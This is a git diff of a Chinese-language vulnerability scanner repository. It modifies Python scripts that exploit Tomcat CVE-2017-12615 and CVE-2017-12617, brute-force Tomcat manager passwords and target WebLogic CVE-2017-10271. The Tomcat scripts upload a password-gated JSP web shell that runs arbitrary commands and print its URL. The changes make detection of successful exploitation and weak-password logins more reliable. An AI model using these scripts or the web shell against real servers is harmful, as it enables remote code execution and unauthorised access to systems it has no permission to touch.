diff --git a/README.md b/README.md index 11c8476..dffe04f 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,11 @@ # vulnerability-list -常见漏洞快速检测,目前包含以下漏洞。 - +常见漏洞快速检测,目前包含以下漏洞。 + +已发现的BUG: + +1. 有些漏洞的判断依据为网页返回信息,但部分网站设置了统一的错误页面,如统一的404页面,因此造成误报。后续针对此类问题通用的解决方式是显示返回页面的大小。 + ## Tomcat - CVE_2017_12615 / CVE_2017_12617 diff --git a/tomcat/CVE_2017_12615.py b/tomcat/CVE_2017_12615.py index 15da3b4..bbff8c8 100644 --- a/tomcat/CVE_2017_12615.py +++ b/tomcat/CVE_2017_12615.py @@ -17,7 +17,8 @@ def attack(URL): url = URL + '/T68t8YT86.jsp/' user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" headers={"User-Agent":user_agent} - data="""<% + data="""CVE-2017-12615 + <% if("fff".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; @@ -33,7 +34,7 @@ def attack(URL): requests.put(url, headers=headers, data=data) time.sleep(2) verify_response = requests.get(url[:-1], headers=headers) - if verify_response.status_code == 200: + if verify_response.status_code == 200 and 'CVE-2017-12615' in verify_response.text: print('存在-Tomcat-CVE-2017-12615!!!') print('shell: ' + url[:-1]+'?pwd=fff&cmd=whoami') else : diff --git a/tomcat/CVE_2017_12617.py b/tomcat/CVE_2017_12617.py index ea82c4d..22d634c 100644 --- a/tomcat/CVE_2017_12617.py +++ b/tomcat/CVE_2017_12617.py @@ -20,7 +20,8 @@ def gen_shell(): def construct_put(url, f): #print(url) - evil = """<% + evil = """CVE-2017-12617 + <% if("fff".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; @@ -55,4 +56,4 @@ def attack(URL): if __name__ == '__main__': - attack() \ No newline at end of file + attack() diff --git a/tomcat/example_vulnerability.py b/tomcat/example_vulnerability.py index e161fdb..2a2f980 100644 --- a/tomcat/example_vulnerability.py +++ b/tomcat/example_vulnerability.py @@ -38,12 +38,12 @@ def attack(URL): if verify_response.status_code == 200 or 304 or 401: try: - print('页面返回状态码:'+str(verify_response.status_code)+' '+url) - except: + print('页面返回状态码:'+str(verify_response.status_code)+' '+'页面返回大小为:'+str(len(verify_response.text))+' '+url) # 因为部分网站设置了统一的404页面,造成误报,因此添加返回长度来进行辅助判断 + except Exception: pass - else : + else: continue - except : + except Exception: print("Someerror!") print('[+]检测结束-Tomcat-example_vulnerability。[+]') print('\n') diff --git a/tomcat/tomcat_weakpasswd.py b/tomcat/tomcat_weakpasswd.py index 7f21367..14c116f 100644 --- a/tomcat/tomcat_weakpasswd.py +++ b/tomcat/tomcat_weakpasswd.py @@ -24,10 +24,10 @@ def attack(URL): headers = {"User-Agent": user_agent,"Authorization":Authorization} try: r = requests.get(url,headers=headers, verify=False) - if r.status_code == 200: - print('[+]发现弱口令'+Authorization) + if r.status_code == 200 and 'Tomcat Web Application Manager' in r.text: + print('[+]发现弱口令'+ txt) elif r.status_code == 401: - print('账户密码错误:',txt) + print('账户密码错误:', txt) else: print('[-]爆破密码出错。') except: diff --git a/weblogic/CVE_2017_10271.py b/weblogic/CVE_2017_10271.py index ca157d7..81c2d36 100644 --- a/weblogic/CVE_2017_10271.py +++ b/weblogic/CVE_2017_10271.py @@ -1,9 +1,12 @@ # -*- coding: utf-8 -*- +import sys import requests +import time from random import * import string + ''' Usage: moon.py -u weblogic http://127.0.0.1:7001